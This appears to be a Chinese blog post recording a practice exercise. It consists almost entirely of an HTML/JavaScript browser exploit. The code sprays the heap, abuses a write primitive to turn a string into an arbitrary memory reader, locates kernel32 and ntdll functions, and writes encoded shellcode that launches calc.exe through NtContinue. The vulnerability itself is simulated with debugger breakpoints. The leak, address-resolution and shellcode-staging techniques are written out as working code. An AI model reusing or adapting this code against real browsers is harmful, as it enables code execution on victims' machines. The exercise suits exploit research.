注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

测试NOROP  

2014-12-01 09:31:42|  分类: 一些练习 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
用泄漏信息构造shellcode,并模拟测试弹计算器。
//*
测试NO ROP运行计算器
泄露基址的硬编码地址请自行改正!
调试请下两个断点:
bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"
bu msvcrt!cos ".echo =run_calc=;r @eip=ntdll!NtContinue;ed @esp+4 0c0c0d0c;g"
*//
<!DOCTYPE HTML>
<HTML>
 <HEAD>
  <TITLE> NO ROP TEST </TITLE>
 </HEAD>

 <BODY>
  <SCRIPT LANGUAGE="JavaScript">
  <!--
var block = "\u0000";

// [ repeat the block to 512KB ]
while (block.length < 0x40000){
block += block;
}

// [ Allocate 200 MB ]
var slide = new Array();
for (var i = 0; i < 400; i++){
slide[i] = block.substr(0,block.length);
}
// alert("heapspary done");

var spryaddr = 0x0c0c0c0c;
var i, p, modified, leakstr, lenaddr;

// 利用漏洞向指定的地址写入内容
Math.atan2(spryaddr, 0x11223344);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

// =ed=
// $t1=0c0c0c0c
// $t2=11223344

for (i = 0; i < slide.length; i++) {
p = slide[i].search(/[^\u0000]/);
if (p != -1) {
modified = i;
leakstr = slide[modified];
lenaddr = spryaddr - (p)*2 - 4;
break;
}
}
alert(lenaddr.toString(16));

// 利用漏洞改写字符串长度为很大的数
Math.atan2(lenaddr, 0x7ffff000);// bu jscript!JsAtan2 ".echo =ed=;r @$t1=poi(poi(@esp+14)+18);r @$t2=poi(poi(@esp+14)+8);ed @$t1 @$t2;r @$t1;r @$t2;g"

// =ed=
// $t1=0c060020
// $t2=7ffff000

var testaddr = 0x3e389ad2; // 用于泄露基址的测试用地址

//alert(leakstr.length.toString(16));
//alert(escape(leakstr.substr((testaddr-lenaddr-4)/2, 8)));

function readDword(address) // address % 2 == 0
{
var str = leakstr.substr((address-lenaddr-4)/2, 2);
return (str.charCodeAt(1)<<16 | str.charCodeAt(0));
}

function GetBaseAddrByPoiAddr( PoiAddr )
{
var BaseAddr = 0;
BaseAddr = PoiAddr & 0xFFFF0000;
while( readDword(BaseAddr)     != 0x00905A4D || 
  readDword(BaseAddr+0xC) != 0x0000FFFF    )
{
BaseAddr -= 0x10000;
}
return BaseAddr;
}
function astr2jstr(astraddr)
{
var str,a,i=0,s="";
a=(astraddr%2)?astraddr-1:astraddr;
str = leakstr.substr((a-lenaddr-4)/2, 32);

if (astraddr % 2 !=0)
{
w=str.charCodeAt(i);
if (w >>8 ) {s=s+"%u00"+(w >> 8).toString(16);i++;} else return s;
}

for (; i<str.length; i++)
{
w=str.charCodeAt(i);
if (w & 0xff) s=s+"%u00"+(w & 0xff).toString(16); else break;
if (w >>8 ) s=s+"%u00"+(w >> 8).toString(16); else break;
}
return (unescape(s));
}

//alert( "astr2jstr="+astr2jstr(testaddr) );

function GetModuleFromImport( ModuleName, LibAddr )
{
var p   = 0;
var pImport;  // PIMAGE_IMPORT_DESCRIPTOR
p = readDword(LibAddr + 0x3C); 
p = readDword(LibAddr + p + 0x80);
pImport = LibAddr + p;
while( readDword(pImport+0x0C) != 0 )
{
if (ModuleName.toLowerCase()==astr2jstr(LibAddr+readDword(pImport+0x0C)).toLowerCase())
{
p = LibAddr + readDword(pImport+0x10);
p = readDword(p+0x10);
return GetBaseAddrByPoiAddr(p);
}
pImport+=0x14;
}
}


function GetProcAddress( LibAddr, ProcName )
{
var FuncAddr;
var pExport;
var pNameBase;
var AddressOfNameOrdinals;
var i;

p = readDword(LibAddr + 0x3C);
p = readDword(LibAddr + p + 0x78);
pExport = LibAddr + p;
NumberOfNames = readDword(pExport + 0x18);
pNameBase = LibAddr + readDword(pExport + 0x20);

for (i=0; i < NumberOfNames; i++)
{
p=LibAddr+readDword(pNameBase+4*i);
if (ProcName.toLowerCase()==astr2jstr(p).toLowerCase())
{
break;
}
}

//alert( i+"==="+astr2jstr(LibAddr+readDword(pNameBase+4*i)) );

t5 = LibAddr + readDword(pExport + 0x24);
t5 = readDword(t5 + 2*i) & 0xffff;
t6 = LibAddr + readDword(pExport + 0x1c);
t6 = LibAddr + readDword(t6 + t5*4);
return t6;
}

var jscript = GetBaseAddrByPoiAddr(testaddr);
var kernel32 = GetModuleFromImport("kernel32.dll", jscript);
var ntdll    = GetModuleFromImport("ntdll.dll", kernel32);
var VirtualProtect = GetProcAddress(kernel32, "VirtualProtect");
var WinExec        = GetProcAddress(kernel32, "WinExec");
var NtContinue     = GetProcAddress(ntdll, "NtContinue");

//alert("jscript="+jscript.toString(16));
//alert("kernel32="+kernel32.toString(16));
//alert("ntdll="+ntdll.toString(16));
//alert("VirtualProtect="+VirtualProtect.toString(16));
//alert("WinExec="+WinExec.toString(16));
//alert("NtContinue="+NtContinue.toString(16));

function dd2str(dword)
{
var d = Number(dword).toString(16);
while (d.length < 8) d = '0' + d;
return ('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));

var sc_ctx = unescape(dd2str(spryaddr+0x1c)+dd2str(spryaddr & 0xffff0000)+"%u0000%u0001%u0040%u0000"+dd2str(spryaddr+0x18)+"%u9090%u9090%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%ue0bb%u2a1d%u680a%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u2e63%u7865%u0065%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u003f%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u1111%u0000%u0000%u003b%u0000%u0023%u0000%u0023%u0000%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222%u2222"+dd2str(VirtualProtect)+"%u001b%u0000%u0246%u0001"+dd2str(spryaddr)+"%u0023%u0000%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u3333%u0000%u0000");

for (i=0; i<sc_ctx.length; i+=2)
{
dword=(sc_ctx.charCodeAt(i+1)<<16 | sc_ctx.charCodeAt(i));
Math.atan2(spryaddr+i*2, dword); // 利用漏洞写入代码到指定地址
}

alert("shellcode test!");
Math.cos(0); // bu msvcrt!cos ".echo =run_calc=;r @eip=ntdll!NtContinue;ed @esp+4 0c0c0d0c;g"
alert("over!");
  //-->
  </SCRIPT>
 </BODY>
</HTML>
  评论这张
 
阅读(112)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017